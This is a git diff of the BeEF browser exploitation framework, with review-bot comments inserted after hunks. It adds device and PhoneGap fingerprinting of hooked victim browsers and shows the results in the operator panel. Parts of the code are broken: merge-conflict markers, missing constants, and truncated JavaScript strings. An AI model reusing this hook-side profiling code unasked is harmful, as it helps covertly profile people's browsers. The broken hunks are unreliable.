diff --git a/VERSION b/VERSION
index 509c304b2..f9105b3dc 100644
--- a/VERSION
+++ b/VERSION
@@ -14,4 +14,4 @@
# limitations under the License.
#
-0.4.3.5-alpha
+0.4.3.6-alpha
diff --git a/config.yaml b/config.yaml
index 41728f809..b9d4f8f08 100644
--- a/config.yaml
+++ b/config.yaml
@@ -16,7 +16,7 @@
# BeEF Configuration file
beef:
- version: '0.4.3.5-alpha'
+ version: '0.4.3.6-alpha'
debug: false
restrictions:
diff --git a/core/core.rb b/core/core.rb
index dc554314b..6dcff13f2 100644
--- a/core/core.rb
+++ b/core/core.rb
@@ -34,6 +34,7 @@ require 'core/main/constants/browsers'
require 'core/main/constants/commandmodule'
require 'core/main/constants/distributedengine'
require 'core/main/constants/os'
+require 'core/main/constants/hardware'
# @note Include core modules for beef
require 'core/main/configuration'
diff --git a/core/filters/browser.rb b/core/filters/browser.rb
index f955fb6f6..7dbcfdfc6 100644
--- a/core/filters/browser.rb
+++ b/core/filters/browser.rb
@@ -47,6 +47,16 @@ module Filters
true
end
+ # Check the Hardware name value - for example, 'iPhone'
+ # @param [String] str String for testing
+ # @return [Boolean] If the string has valid Hardware name characters
+ def self.is_valid_hwname?(str)
+ return false if not is_non_empty_string?(str)
+ return false if has_non_printable_char?(str)
+ return false if str.length < 2
+ true
+ end
+
# Verify the browser version string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid browser version characters
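Review bot: `is_valid_hwname?` puts no upper bound on `str`, so an arbitrarily long value reported by the hooked browser passes and is stored via `BD.set` in browserdetails.rb; the `length < 2` test is the only size check in the new method. If the operating-system validator called just above it in browserdetails.rb caps length, mirror that here with `return false if str.length > <MAX_LEN>` (placeholder, use the same limit). The method is self-contained within the hunk.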
diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 762072108..2e82f5de6 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -551,6 +551,19 @@ beef.browser = {
},
+ /**
+ * Checks if the Phonegap API is available from the hooked domain.
+ * @return: {Boolean} true or false.
+ *
+ * @example: if(beef.browser.hasJava()) { ... }
+ */
+ hasPhonegap: function() {
+ var result = false;
+ try { if (!!device.phonegap) result = true; else result = false; }
+ catch(e) { result = false; }
+ return result;
+ },
+
/**
* Checks if the zombie has Java installed and enabled.
* @return: {Boolean} true or false.
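Review bot: The `@example` line on the new `hasPhonegap` doc block still reads `beef.browser.hasJava()`, a leftover from the block it was copied from; it should be `@example: if(beef.browser.hasPhonegap()) { ... }`. The body can also drop the redundant if/else: `try { result = !!device.phonegap; } catch(e) { result = false; }` produces the same boolean, and the catch still returns false when the `device` global is absent. A short comment that `device` is only defined once the PhoneGap runtime has loaded, which is why a ReferenceError is expected and swallowed, would make the try/catch self-explanatory.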
@@ -765,6 +778,7 @@ beef.browser = {
var browser_plugins = beef.browser.getPlugins();
var date_stamp = new Date().toString();
var os_name = beef.os.getName();
+ var hw_name = beef.hardware.getName();
var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
var screen_size = beef.browser.getScreenSize();
@@ -772,6 +786,7 @@ beef.browser = {
var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No";
var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No";
var has_flash = (beef.browser.hasFlash())? "Yes" : "No";
+ var has_phonegap = (beef.browser.hasPhonegap())? "Yes" : "No";
var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No";
var has_web_socket=(beef.browser.hasWebSocket())? "Yes":"No";
var has_activex = (typeof(window.ActiveXObject) != "undefined") ? "Yes":"No";
@@ -789,6 +804,7 @@ beef.browser = {
if(hostport) details["HostPort"] = hostport;
if(browser_plugins) details["BrowserPlugins"] = browser_plugins;
if(os_name) details['OsName'] = os_name;
+ if(hw_name) details['Hardware'] = hw_name;
if(date_stamp) details['DateStamp'] = date_stamp;
if(system_platform) details['SystemPlatform'] = system_platform;
if(browser_type) details['BrowserType'] = browser_type;
@@ -797,6 +813,7 @@ beef.browser = {
if(java_enabled) details['JavaEnabled'] = java_enabled;
if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
if(has_flash) details['HasFlash'] = has_flash
+ if(has_phonegap) details['HasPhonegap'] = has_phonegap
if(has_web_socket) details['HasWebSocket'] = has_web_socket
if(has_googlegears) details['HasGoogleGears'] = has_googlegears
if(has_activex) details['HasActiveX'] = has_activex;
diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js
new file mode 100644
index 000000000..f498c53ac
--- /dev/null
+++ b/core/main/client/hardware.js
@@ -0,0 +1,74 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.hardware = {
+
+ ua: navigator.userAgent,
+
+ isWinPhone: function() {
+ return (this.ua.match('(Windows Phone)')) ? true : false;
+ },
+
+ isIphone: function() {
+ return (this.ua.indexOf('iPhone') != -1) ? true : false;
+ },
+
+ isIpad: function() {
+ return (this.ua.indexOf('iPad') != -1) ? true : false;
+ },
+
+ isIpod: function() {
+ return (this.ua.indexOf('iPod') != -1) ? true : false;
+ },
+
+ isNokia: function() {
+ return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
+ },
+
+ isBlackBerry: function() {
+ return (this.ua.match('BlackBerry')) ? true : false;
+ },
+
+ isZune: function() {
+ return (this.ua.match('ZuneWP7')) ? true : false;
+ },
+
+ isKindle: function() {
+ return (this.ua.match('Kindle')) ? true : false;
+ },
+
+ getName: function() {
+
+ if(this.isNokia()) {
+
+ if (this.ua.indexOf('Maemo Browser') != -1) return 'Maemo';
+ if (this.ua.match('(SymbianOS)|(Symbian OS)')) return 'SymbianOS';
+ if (this.ua.indexOf('Symbian') != -1) return 'Symbian';
+
+ //return 'Nokia';
+ }
+
+ if (this.isWinPhone()) return 'Windows Phone';
+ if (this.isBlackBerry()) return 'BlackBerry';
+ if (this.isIphone()) return 'iPhone';
+ if (this.isIpad()) return 'iPad';
+ if (this.isIpod()) return 'iPod';
+ if (this.isKindle()) return 'Kindle';
+
+ return 'unknown';
+ }
+};
+
+beef.regCmp('beef.net.hardware');
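Review bot: The final line registers the component as `beef.regCmp('beef.net.hardware')`, but the object this file defines is `beef.hardware`; if regCmp is consulted by name elsewhere the new component is recorded under the wrong key, so it should read `beef.regCmp('beef.hardware');`. In `getName` the Nokia branch only returns for Maemo and Symbian and then falls through because `//return 'Nokia';` is commented out, so a user agent that matched `isNokia()` but neither of those ends up as `'unknown'`; either restore the return or delete the dead comment. `isZune` is defined but never called by `getName`, so Zune devices also report `'unknown'` although `HW_ZUNE_*` constants exist on the Ruby side.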
diff --git a/core/main/client/os.js b/core/main/client/os.js
index c133edcc9..9ccea8a9c 100644
--- a/core/main/client/os.js
+++ b/core/main/client/os.js
@@ -72,7 +72,11 @@ beef.os = {
isMacintosh: function() {
return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
},
-
+
+ isWinPhone: function() {
+ return (this.ua.match('(Windows Phone)')) ? true : false;
+ },
+
isIphone: function() {
return (this.ua.indexOf('iPhone') != -1) ? true : false;
},
@@ -97,6 +101,10 @@ beef.os = {
return (this.ua.match('BlackBerry')) ? true : false;
},
+ isWebOS: function() {
+ return (this.ua.match('webOS')) ? true : false;
+ },
+
isQNX: function() {
return (this.ua.match('QNX')) ? true : false;
},
@@ -139,11 +147,14 @@ beef.os = {
if(this.isSunOS()) return 'Sun OS';
//iPhone
- if (this.isIphone()) return 'iPhone';
+ if (this.isIphone()) return 'iOS';
//iPad
- if (this.isIpad()) return 'iPad';
+ if (this.isIpad()) return 'iOS';
//iPod
- if (this.isIpod()) return 'iPod';
+ if (this.isIpod()) return 'iOS';
+
+ // zune
+ //if (this.isZune()) return 'Zune';
//macintosh
if(this.isMacintosh()) {
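Review bot: The commented-out `//if (this.isZune()) return 'Zune';` references `isZune`, which this commit defines on `beef.hardware` but not on `beef.os`, so the line cannot be uncommented later as-is; delete it rather than leaving dead code. Likewise `isWinPhone` is added to `beef.os` in the first hunk of this file but none of the visible `getName` hunks call it, and the identical check already lives in hardware.js; unless a branch outside the hunks uses it, drop it from os.js so the two detectors do not drift apart.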
@@ -156,6 +167,7 @@ beef.os = {
//others
if(this.isQNX()) return 'QNX';
if(this.isBeOS()) return 'BeOS';
+ if(this.isWebOS()) return 'webOS';
return 'unknown';
}
diff --git a/core/main/constants/hardware.rb b/core/main/constants/hardware.rb
new file mode 100644
index 000000000..63958a210
--- /dev/null
+++ b/core/main/constants/hardware.rb
@@ -0,0 +1,73 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+module BeEF
+module Core
+module Constants
+
+ # @note The hardware's strings for hardware detection.
+ module Hardware
+
+ HW_UNKNOWN_IMG = 'pc.png'
+ HW_IPHONE_UA_STR = 'iPhone'
+ HW_IPHONE_IMG = 'iphone.jpg'
+ HW_IPAD_UA_STR = 'iPad'
+ HW_IPAD_IMG = 'ipad.png'
+ HW_IPOD_UA_STR = 'iPod'
+ HW_IPOD_IMG = 'ipod.jpg'
+ HW_BLACKBERRY_UA_STR = 'BlackBerry'
+ HW_BLACKBERRY_IMG = 'blackberry.png'
+ HW_ANDROID_UA_STR = 'Android'
+ HW_ANDROID_IMG = 'android.png'
+ HW_WINPHONE_UA_STR = 'Windows Phone'
+ HW_WINPHONE_IMG = 'win.png'
+ HW_ZUNE_UA_STR = 'ZuneWP7'
+ HW_ZUNE_IMG = 'zune.gif'
+ HW_KINDLE_UA_STR = 'Kindle'
+ HW_KINDLE_IMG = 'kindle.png'
+ HW_ALL_UA_STR = 'All'
+
+ # Attempt to match operating system string to constant
+ # @param [String] name Name of operating system
+ # @return [String] Constant name of matched operating system, returns 'ALL' if nothing are matched
+ def self.match_hardware(name)
+ case name.downcase
+ when /iphone/
+ HW_IPHONE_UA_STR
+ when /ipad/
+ HW_IPAD_UA_STR
+ when /ipod/
+ HW_IPOD_UA_STR
+ when /blackberry/
+ HW_BLACKBERRY_UA_STR
+ when /android/
+ HW_ANDROID_UA_STR
+ when /windows phone/
+ HW_WINPHONE_UA_STR
+ when /zune/
+ HW_ZUNE_UA_STR
+ when /kindle/
+ HW_KINDLE_UA_STR
+ else
+ 'ALL'
+ end
+ end
+
+ end
+
+end
+end
+end
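Review bot: `match_hardware` documents itself as matching an operating system and returning 'ALL', both copied from os.rb; the comment should read `# Attempt to match hardware name string to constant` and `# @param [String] name Name of hardware`, and the fallback should return the constant defined just above, `HW_ALL_UA_STR`, rather than the literal `'ALL'`, whose casing does not even match its value `'All'`. `name.downcase` raises NoMethodError on nil, so if a caller can pass a missing hardware name add `return HW_ALL_UA_STR if name.nil?` as a guard.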
diff --git a/core/main/constants/os.rb b/core/main/constants/os.rb
index 2e86f1e39..15c8a1b67 100644
--- a/core/main/constants/os.rb
+++ b/core/main/constants/os.rb
@@ -29,17 +29,19 @@ module Constants
OS_MAC_UA_STR = 'Mac'
OS_MAC_IMG = 'mac.png'
OS_QNX_UA_STR = 'QNX'
- OS_QNX_IMG = 'qnx.ico'
+ OS_QNX_IMG = 'qnx.ico'
OS_BEOS_UA_STR = 'BeOS'
- OS_BEOS_IMG = 'beos.png'
+ OS_BEOS_IMG = 'beos.png'
OS_OPENBSD_UA_STR = 'OpenBSD'
OS_OPENBSD_IMG = 'openbsd.ico'
+ OS_IOS_UA_STR = 'iOS'
+ OS_IOS_IMG = 'ios.png'
OS_IPHONE_UA_STR = 'iPhone'
- OS_IPHONE_IMG = 'iphone.png'
+ OS_IPHONE_IMG = 'iphone.jpg'
OS_IPAD_UA_STR = 'iPad'
- OS_IPAD_IMG = 'ipad.png'
+ OS_IPAD_IMG = 'ipad.png'
OS_IPOD_UA_STR = 'iPod'
- OS_IPOD_IMG = 'ipod.jpg'
+ OS_IPOD_IMG = 'ipod.jpg'
OS_MAEMO_UA_STR = 'Maemo'
OS_MAEMO_IMG = 'maemo.ico'
OS_BLACKBERRY_UA_STR = 'BlackBerry'
@@ -65,12 +67,8 @@ module Constants
OS_BEOS_UA_STR
when /openbsd/
OS_OPENBSD_UA_STR
- when /iphone/
- OS_IPHONE_UA_STR
- when /ipad/
- OS_IPAD_UA_STR
- when /ipod/
- OS_IPOD_UA_STR
+ when /ios/, /iphone/, /ipad/, /ipod/
+ OS_IOS_UA_STR
when /maemo/
OS_MAEMO_UA_STR
when /blackberry/
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index dfb3b8040..9a5f27946 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -118,6 +118,14 @@ module BeEF
self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
end
+ # get and store the hardware name
+ hw_name = get_param(@data['results'], 'Hardware')
+ if BeEF::Filters.is_valid_hwname?(hw_name)
+ BD.set(session_id, 'Hardware', hw_name)
+ else
+ self.err_msg "Invalid hardware name returned from the hook browser's initial connection."
+ end
+
# get and store the date
date_stamp = get_param(@data['results'], 'DateStamp')
if BeEF::Filters.is_valid_date_stamp?(date_stamp)
@@ -222,6 +230,14 @@ module BeEF
self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection."
end
+ # get and store the yes|no value for HasPhonegap
+ has_phonegap = get_param(@data['results'], 'HasPhonegap')
+ if BeEF::Filters.is_valid_yes_no?(has_phonegap)
+ BD.set(session_id, 'HasPhonegap', has_phonegap)
+ else
+ self.err_msg "Invalid value for HasPhonegap returned from the hook browser's initial connection."
+ end
+
# get and store the yes|no value for HasGoogleGears
has_googlegears = get_param(@data['results'], 'HasGoogleGears')
if BeEF::Filters.is_valid_yes_no?(has_googlegears)
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index aa1fc5694..b2743a1e6 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -32,9 +32,15 @@ module Modules
# @note we load websocket library only if ws server is enabled in config.yalm
# check in init.js
if config.get("beef.http.websocket.enable")
+<<<<<<< HEAD
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js websocket.js )
else
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js)
+=======
+ js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js)
+ else
+ js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js)
+>>>>>>> 123b81b2b47ce59c45d6e59e489b342b85a70a77
end
# @note construct the beefjs string from file(s)
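Review bot: This hunk commits unresolved merge-conflict markers (`<<<<<<< HEAD`, `=======`, `>>>>>>> 123b81b…`), which are a Ruby syntax error, so beefjs.rb fails to load and no hook script can be served. Resolve to a single if/else that keeps the HEAD list (it carries `lib/jools.min.js` and `are.js`) and inserts `hardware.js` after `os.js` as the other side intended, assuming the HEAD additions are still wanted. The enclosing method continues outside the hunk.
```ruby
if config.get("beef.http.websocket.enable")
  js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js websocket.js )
else
  js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js)
end
```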
diff --git a/core/main/models/browserdetails.rb b/core/main/models/browserdetails.rb
index 0cd114c75..ae3868691 100644
--- a/core/main/models/browserdetails.rb
+++ b/core/main/models/browserdetails.rb
@@ -62,7 +62,7 @@ module Models
browserdetails
end
-
+
#
# Returns the icon representing the browser type the
# hooked browser is using (i.e. Firefox, Internet Explorer)
@@ -94,9 +94,10 @@ module Models
return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR
- return BeEF::Core::Constants::Os::OS_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
- return BeEF::Core::Constants::Os::OS_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
- return BeEF::Core::Constants::Os::OS_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
+ return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR
+ return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
+ return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
+ return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
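Review bot: `os_icon` now references `BeEF::Core::Constants::Os::OS_WEBOS_IMG` and `OS_WEBOS_UA_STR`, but the os.rb hunk in this commit only adds the `OS_IOS_*` pair; unless the webOS constants already exist outside that hunk, the new line raises NameError as soon as it is reached, before any of the iOS checks below it. Either add `OS_WEBOS_UA_STR = 'webOS'` and `OS_WEBOS_IMG = '<icon-file>'` (placeholder) next to the new iOS constants in os.rb, or drop the line. `os_icon` starts outside the hunk.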
@@ -105,6 +106,26 @@ module Models
BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
end
+ #
+ # Returns the icon representing the hardware the
+ # zombie is running on (i.e. iPhone, BlackBerry)
+ #
+ def self.hw_icon(session_id)
+
+ ua_string = get(session_id, 'BrowserReportedName')
+
+ return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
+
+ return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_ZUNE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ZUNE_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPHONE_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPAD_UA_STR
+ return BeEF::Core::Constants::Hardware::HW_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPOD_UA_STR
+
+ BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG
+
+ end
+
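Review bot: `hw_icon` never returns `HW_BLACKBERRY_IMG` or `HW_KINDLE_IMG` even though hardware.rb defines them and `beef.hardware.getName` reports 'BlackBerry' and 'Kindle', so those zombies fall back to `HW_UNKNOWN_IMG`; add `return BeEF::Core::Constants::Hardware::HW_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_BLACKBERRY_UA_STR` and the equivalent Kindle line before the fallback. The method matches on the raw `'BrowserReportedName'` string rather than the validated `'Hardware'` value the handler stores, which is worth a one-line comment such as `# matched on the raw user agent, not the stored 'Hardware' value`, as is the reason Windows Phone is tested before iPhone (presumably overlapping UA tokens; confirm).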
end
end
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index b30573a0d..6fce2a02c 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -136,7 +136,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# set and add the return values for the os name
os_name = BD.get(zombie_session, 'OsName')
- if not host_name.nil?
+ if not os_name.nil?
encoded_os_name = CGI.escapeHTML(os_name)
encoded_os_name_hash = { 'OS Name' => encoded_os_name }
@@ -148,6 +148,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController
summary_grid_hash['results'].push(page_name_row) # add the row
end
+
+ # set and add the return values for the hardware name
+ hw_name = BD.get(zombie_session, 'Hardware')
+ if not hw_name.nil?
+ encoded_hw_name = CGI.escapeHTML(hw_name)
+ encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
+
+ page_name_row = {
+ 'category' => 'Host',
+ 'data' => encoded_hw_name_hash,
+ 'from' => 'Initialization'
+ }
+
+ summary_grid_hash['results'].push(page_name_row) # add the row
+ end
# set and add the return values for the browser name
browser_name = BD.get(zombie_session, 'BrowserName')
@@ -331,6 +346,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController
summary_grid_hash['results'].push(page_name_row) # add the row
end
+ # set and add the yes|no value for hasPhonegap
+ has_phonegap = BD.get(zombie_session, 'hasPhonegap')
+ if not has_phonegap.nil?
+ encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
+ encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
+
+ page_name_row = {
+ 'category' => 'Browser',
+ 'data' => encoded_has_phonegap_hash,
+ 'from' => 'Initialization'
+ }
+
+ summary_grid_hash['results'].push(page_name_row) # add the row
+ end
+
# set and add the yes|no value for HasGoogleGears
has_googlegears = BD.get(zombie_session, 'HasGoogleGears')
if not has_googlegears.nil?
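Review bot: `BD.get(zombie_session, 'hasPhonegap')` uses a lower-case key, while the handler in browserdetails.rb stores the value under `'HasPhonegap'` and shellinterface.rb reads `'HasPhonegap'`, so this lookup is always nil and the 'Has Phonegap' row is never added to the summary grid. Change it to `has_phonegap = BD.get(zombie_session, 'HasPhonegap')`.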
diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index f50adb121..6c101681a 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -84,18 +84,38 @@ class Panel < BeEF::Extension::AdminUI::HttpController
# create a hash of simple hooked browser details
def get_simple_hooked_browser_hash(hooked_browser)
-
- browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
- os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
- domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
-
+
+ browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName')
+ browser_version = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserVersion')
+ browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
+ os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
+ os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName')
+ hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session)
+ hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
+ domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
+ has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
+ has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
+ has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
+ has_phonegap = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasPhonegap')
+ date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
+
return {
- 'session' => hooked_browser.session,
- 'ip' => hooked_browser.ip,
- 'domain' => domain,
- 'port' => hooked_browser.port.to_s,
- 'browser_icon' => browser_icon,
- 'os_icon' => os_icon
+ 'session' => hooked_browser.session,
+ 'ip' => hooked_browser.ip,
+ 'domain' => domain,
+ 'port' => hooked_browser.port.to_s,
+ 'browser_name' => browser_name,
+ 'browser_version' => browser_version,
+ 'browser_icon' => browser_icon,
+ 'os_icon' => os_icon,
+ 'os_name' => os_name,
+ 'hw_icon' => hw_icon,
+ 'hw_name' => hw_name,
+ 'has_flash' => has_flash,
+ 'has_web_sockets' => has_web_sockets,
+ 'has_googlegears' => has_googlegears,
+ 'has_phonegap' => has_phonegap,
+ 'date_stamp' => date_stamp
}
end
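Review bot: The new `browser_name`, `browser_version`, `os_name`, `hw_name`, `domain` and has_* values are returned raw, and ZombiesMgr.js concatenates them into `balloon_text`, which zombiesTreeList.js then assigns to `qtip`, an HTML tooltip (the per-domain folder `qtip` in the same file is built from `folder` the same way). These strings originate from the hooked browser's own report, and `is_valid_hwname?` only rejects non-printable characters, so markup sent by a hooked page reaches the admin panel unescaped; modules.rb escapes the same fields with `CGI.escapeHTML`, and this method should too, keeping nil as nil so the tree code can still test for absence. Check that panel.rb already requires `cgi`, since only modules.rb is visibly using it.
```ruby
details = BeEF::Core::Models::BrowserDetails
esc = lambda { |v| v.nil? ? nil : CGI.escapeHTML(v.to_s) }   # keep nil so callers can still test for absence
browser_name    = esc.call(details.get(hooked_browser.session, 'BrowserName'))
browser_version = esc.call(details.get(hooked_browser.session, 'BrowserVersion'))
os_name         = esc.call(details.get(hooked_browser.session, 'OsName'))
hw_name         = esc.call(details.get(hooked_browser.session, 'Hardware'))
domain          = esc.call(details.get(hooked_browser.session, 'HostName'))
# … unchanged: browser_icon/os_icon/hw_icon lookups, has_* fields, date_stamp, returned hash …
```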
diff --git a/extensions/admin_ui/media/images/icons/ios.png b/extensions/admin_ui/media/images/icons/ios.png
new file mode 100644
index 000000000..de94a27ce
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/ios.png differ
diff --git a/extensions/admin_ui/media/images/icons/iphone.jpg b/extensions/admin_ui/media/images/icons/iphone.jpg
new file mode 100644
index 000000000..134b5c9f9
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/iphone.jpg differ
diff --git a/extensions/admin_ui/media/images/icons/iphone.png b/extensions/admin_ui/media/images/icons/iphone.png
deleted file mode 100644
index ab4a8cc31..000000000
Binary files a/extensions/admin_ui/media/images/icons/iphone.png and /dev/null differ
diff --git a/extensions/admin_ui/media/images/icons/kindle.png b/extensions/admin_ui/media/images/icons/kindle.png
new file mode 100644
index 000000000..b858fc003
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/kindle.png differ
diff --git a/extensions/admin_ui/media/images/icons/pc.png b/extensions/admin_ui/media/images/icons/pc.png
new file mode 100644
index 000000000..d8f38aca7
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/pc.png differ
diff --git a/extensions/admin_ui/media/images/icons/zune.gif b/extensions/admin_ui/media/images/icons/zune.gif
new file mode 100644
index 000000000..6d8259b13
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/zune.gif differ
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index c764f94cf..e161c8209 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -20,18 +20,49 @@ var ZombiesMgr = function(zombies_tree_lists) {
// this is a helper class to create a zombie object from a JSON hash index
this.zombieFactory = function(index, zombie_array){
- text = "
";
- text += "
";
- text += zombie_array[index]["ip"];
+
+ var ip = zombie_array[index]["ip"];
+ var session = zombie_array[index]["session"];
+ var browser_name = zombie_array[index]["browser_name"];
+ var browser_version = zombie_array[index]["browser_version"];
+ var browser_icon = zombie_array[index]["browser_icon"];
+ var os_icon = zombie_array[index]["os_icon"];
+ var os_name = zombie_array[index]["os_name"];
+ var hw_name = zombie_array[index]["hw_name"];
